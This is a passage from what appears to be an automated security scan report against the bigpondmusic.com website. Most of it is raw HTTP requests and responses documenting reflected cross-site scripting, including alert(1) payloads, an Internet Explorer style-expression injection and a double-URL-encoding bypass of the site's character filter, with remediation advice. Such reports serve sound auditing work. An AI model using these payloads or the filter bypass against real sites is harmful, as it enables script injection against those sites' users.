HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 02:48:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 154644
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Top 40 Music Tracks - MP3 Mu ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts/tracks/?1386a"style="x:expression(alert(1))"a92dacae792=1" /> ...[SNIP]...
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d89c"style%3d"x%3aexpression(alert(1))"f07ec62371a was submitted in the ref parameter. This input was echoed as 4d89c"style="x:expression(alert(1))"f07ec62371a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /charts/tracks/?ref=Net-Head-Music-TopTracks4d89c"style%3d"x%3aexpression(alert(1))"f07ec62371a HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:11:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 154602
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Top 40 Music Tracks - MP3 Mu ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts/tracks/?ref=Net-Head-Music-TopTracks4d89c"style="x:expression(alert(1))"f07ec62371a" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36829%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef82e2dc5874 was submitted in the REST URL parameter 1. This input was echoed as 36829"><script>alert(1)</script>f82e2dc5874 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /decades36829%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef82e2dc5874 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87926
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5cfa'%3b90b3725ab42 was submitted in the REST URL parameter 1. This input was echoed as c5cfa';90b3725ab42 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /decadesc5cfa'%3b90b3725ab42 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87948
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.276. http://bigpondmusic.com/decades [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/decades
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57a55"style%3d"x%3aexpression(alert(1))"44232a867e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 57a55"style="x:expression(alert(1))"44232a867e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /decades?57a55"style%3d"x%3aexpression(alert(1))"44232a867e3=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:27:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 84269
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>The Best Music From Each Dec ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/decades?57a55"style="x:expression(alert(1))"44232a867e3=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8505%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ec4678964e was submitted in the REST URL parameter 1. This input was echoed as e8505"><script>alert(1)</script>7ec4678964e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88631
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a0e0'%3b97f900614f0 was submitted in the REST URL parameter 1. This input was echoed as 7a0e0';97f900614f0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88134
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12993%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98a33dd2277 was submitted in the REST URL parameter 1. This input was echoed as 12993"><script>alert(1)</script>98a33dd2277 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:26 GMT Content-Type: text/html; charset=utf-8 Content-Length: 88337
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea57b'%3bab49e4aa771 was submitted in the REST URL parameter 1. This input was echoed as ea57b';ab49e4aa771 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:28 GMT Content-Type: text/html; charset=utf-8 Content-Length: 88010
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc38f'%3be7c283e434a was submitted in the REST URL parameter 1. This input was echoed as bc38f';e7c283e434a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 87782
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 858db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb66ce8c9b91 was submitted in the REST URL parameter 1. This input was echoed as 858db"><script>alert(1)</script>b66ce8c9b91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:21 GMT Content-Type: text/html; charset=utf-8 Content-Length: 88392
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94baf'%3b28975e5ccf was submitted in the REST URL parameter 1. This input was echoed as 94baf';28975e5ccf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript94baf'%3b28975e5ccf/SWFObject.js HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:25:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:25:42 GMT Content-Type: text/html; charset=utf-8 Content-Length: 87818
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 258a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2d69280afe was submitted in the REST URL parameter 1. This input was echoed as 258a9"><script>alert(1)</script>a2d69280afe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /javascript258a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2d69280afe/SWFObject.js HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:25:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:25:39 GMT Content-Type: text/html; charset=utf-8 Content-Length: 87932
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c4c8'%3bf0102640660 was submitted in the REST URL parameter 1. This input was echoed as 1c4c8';f0102640660 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:12 GMT Content-Type: text/html; charset=utf-8 Content-Length: 88063
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca247%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee1cfd71e70f was submitted in the REST URL parameter 1. This input was echoed as ca247"><script>alert(1)</script>e1cfd71e70f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:09 GMT Content-Type: text/html; charset=utf-8 Content-Length: 87893
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5b1f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e348d75bea16 was submitted in the REST URL parameter 1. This input was echoed as f5b1f"><script>alert(1)</script>348d75bea16 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:16 GMT Content-Type: text/html; charset=utf-8 Content-Length: 87968
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45d35'%3b6539c03054d was submitted in the REST URL parameter 1. This input was echoed as 45d35';6539c03054d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:19 GMT Content-Type: text/html; charset=utf-8 Content-Length: 87926
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8941'%3bf00409023df was submitted in the REST URL parameter 1. This input was echoed as d8941';f00409023df in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:06 GMT Content-Type: text/html; charset=utf-8 Content-Length: 88086
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e4d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8040fb59f was submitted in the REST URL parameter 1. This input was echoed as 8e4d3"><script>alert(1)</script>a8040fb59f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:04 GMT Content-Type: text/html; charset=utf-8 Content-Length: 87880
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b81f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb2bb523864 was submitted in the REST URL parameter 1. This input was echoed as 3b81f"><script>alert(1)</script>bb2bb523864 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:07:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: private Expires: Tue, 23 Nov 2010 03:07:20 GMT Content-Type: text/html; charset=utf-8 Content-Length: 88268
